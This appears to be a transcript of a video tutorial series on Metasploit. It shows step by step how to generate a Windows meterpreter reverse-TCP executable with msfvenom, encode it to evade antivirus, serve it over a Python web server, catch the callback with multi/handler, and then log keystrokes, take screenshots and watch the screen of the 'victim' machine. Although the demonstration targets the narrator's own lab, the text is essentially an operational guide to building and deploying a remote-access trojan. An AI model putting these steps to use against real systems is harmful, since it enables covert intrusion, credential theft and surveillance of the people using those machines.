Well, hello. In this video, I'm going to talk about Msfvenom and how we can use Msfvenom to create payloads. So, technically, Msfvenom is actually used to create and generate payloads. But before that, we're using MSF payload and MSF encode to create payloads and also encode the payload respectively. And Msfvenom is part of the Metasploit framework, right? So with that being said, in this video I'm going to show you how to create payloads, right? And then how you're going to encode the payload, right? So this is the actual function of Msfvenom. Then with that being said too, I'm going to also create a generic payload. I'm going to test that on a Windows platform with the help of the meter from the Metasploit framework. So going to be like this. We need a Metasploit framework, and then we are going to need the meter and also Msfvenom in this video. So with that being said, let's get into the practical aspect of this video. So we'll be taking a look at Msfvenom like I said earlier. So first we type sudo, then Msfvenom, right? And then from there you can type -h. So these are the associated commands that comes with Msfvenom. You have the -l for list, you have the -p for the payloads, right? And we have the -e for the encoders. So we can go ahead and type this command, sudo Msfvenom, then -l followed by encoders. So with this command is going to display the encoders that are associated with Msfvenom. It's necessary to have encoders or to encode your payload because it's a way of evading antivirus detection. So as you can see on the screen here, we have a list of encoders with their rankings, but we often use Shikatakanai. Looking at them, ranking is quite excellent. That is the most popular ones that people often use, right? And so from there we're going to create a generic payload. This is going to be a playlist. From this video I'm going to show you how you're going to connect with the victim's machine after we've created a payload, right? So you go ahead and type sudo, then Msfvenom. And before that, I think we have to take a look at my IP address first. So you go ahead and type, because you're going to use that for the creation of the payload. So this is the IP address over here. I think I have to keep that in mind as well. So you go ahead and type sudo Msfvenom followed by a -p, that is the type of payload, then Windows /meter /reverse _TCP. Then you go ahead and type lhost. So this is what where we're going to put our password, our IP address, and followed by our port number, which is going to be 444. That's the generic one that you can remember. Then go ahead and follow by the -f. So the -f is for the type of file format, which is going to be exe, and then followed by a -o, which is going to be the file name. So let's say we are going to use signet.exe as a payload's name. So this is a generic payload that we're going to create over here. Go ahead and press enter. So as you can see, we actually done here. Go ahead and type ls here and you can view your payload. So this is a payload, right? So in the next video I'm going to show you how you are going to send a payload onto the Windows machine. So I have my Windows machine here, which we're going to use for the testing. So I'll see you in the next video. Thank you. welcome back. So in this video we are going to send a payload to the Windows machine. In order to do that, we are going to create a web server which is going to host a website in that case, so that we can download it from the Kali machine. So without wasting much time, let's get into the video. So we are going to start a Python server. So to begin with, we're going to type sudo python 3 and then -m, that is the module. I'm going to use http://server followed by the port that you want to run. I'll prefer using port 8080. Press enter on the keyboard, right? So it's going to start a web server. So in order to access the web server on the Windows machine, you're just going to type the IP address of the Linux machine to the web browser, and then from there you can access. So what you're going to do next is that we are going to type the IP address of the Kali machine followed by the port number that we used. That was port 8080. And as you can see here, we have the Linux machine acting as a web server, right? So you can go ahead and look for our payload, which is the signet.exe, and then we are going to save it here, going to keep it. So we are done for this part of the video. So we go back to the Kali machine and we are going to launch Metasploit framework. So after we are done downloading the payload onto the Windows machine, we come back to the Kali machine and then to launch the Metasploit framework. So before you begin, there are certain things that you need to initialize or commands that you need to enter before you start the Metasploit machine. So if I say type sudo service post SQL and start, so it's going to start the database service. Then you initialize the database, right? You're going to initialize the database, so you go ahead and type sudo msfdb initialize, right? And then finally you launch your Metasploit framework. So there you have it. So as you can see on the screen, our Metasploit framework has now been launched. So you go ahead, we're going to set up a meterpreter which is going to receive reverse connection from the Windows machine after we execute the payload. So you go ahead and type use exploit/multi/handler, right? You press enter, and then you're going to set the payload to the one that you use to create the payload on Msfvenom. It's going to type windows/meterpreter/reverse_TCP. So you set the payload to you set the payload to correspond with how you created that on Msfvenom. So you go ahead and type show options. This is going to give you display the necessary input that you're going to do. So if you take a look at what you can see, we have L host and L port. So you are going to set the L host to your local IP address, right? And then the L port to the port number that you use in creating the payload, right? So you go ahead and type set L host, right? Then followed by the IP address 192.168.56.s106 rather. Sorry, 106. Go ahead and press enter. So you take a look at it again, show options and see if is actually been set. So as you can see, the IP address has been set to L host has been set to their local IP address, and the L port is also set to 444. So it makes things a bit easier. So you go ahead and type exploit. In this case, it will be waiting for you to execute the payload on the Windows machine, right? So as you type this, you wait. Down, you're going to switch to the Windows machine, and then you are going to execute the payload here. So we are going to execute the payload on the Windows machine. So you go ahead and run it. And now we have remote access to the Windows machine. To confirm that, you are going to type the following commands. The first thing that you're going to do is that you're going to type help, right? So it's going to give you all the necessary commands that you need to execute these arbitrary codes from, or remote code execution from your end, right? So I'll see you in the next video. Thank you. Previous video, we were able to have a remote connection with the Windows machine. So from here, we are going to check whether we have access to the Windows machine, right? So there are various commands here. Like I said, the first command that you have to type is help, so that you can see the various commands associated with Meterpreter. In order to see whether you are on the real machine, go ahead and type sysinfo. We show you what device you're connected to, and that is the device, right? Two users logged in. The reason is because there is one being a local login and one is a remote login. That is that is why you're seeing two over here. Speaks a lot. And so the next thing that you can do here is that you can also perform a keystroke capture, right? And to do that, you type key scan, and then let's come back to the Windows machine. Start typing anything on Notepad. It can be we have hacked this device, right? Type key scan _ dump, right? So with this command, you are going to dump all the keystrokes that you've captured, right? And it's going to be saved. So as you can see, this was what was typed, whether you've been hacked. This device has been hacked, as you can see here, right? You can also stop it by typing key scan stop, right? So this is quite dangerous to look at in case someone compromises your system, and now the person can actually capture your keystrokes, right? And then you can also have a screenshot as well, and go ahead by typing just screenshot. So you can capture a screenshot of your desktop, and you can go and check your home on your Kali machine, and then you can see that they've captured. You can see that they've captured the Windows desktop. As you can see here, they've captured the Windows desktop, from the screen capture, which makes it very dangerous to look at. And you can also have a screen share as well, right? Have a screen share here so they can see whatever is going on. You can see whatever is going on the victim's machine, right? You can go ahead and type screen share over here, and then with this link it will automatically launch it, even if you don't open it up, but it will automatically launch it. You can also copy the URL and then you paste it here, and it's going to launch it as well. So it's going to launch it as well, so there's no big deal. can go both ways. So as you can see, if I'm running my Windows machine here, whatever I do here can be seen on the Linux machine, right? Whatever I do here can be seen on the Linux machine, as you can see. So the Linux machine is on the Kali machine is on the left side, and then the Windows machine is on the right side, right? Yeah. So this is how you can create a payload and then launch the payload on a Windows machine. This is how you can create a Windows payload, launch it, and then you can control the victim's device on your machine. If you like this video, do also like and subscribe and leave a thumbs up, and make sure you leave a comment underneath. Anything that you didn't understand, you can leave a comment below the video and I'll respond to you. Thank you for watching this video.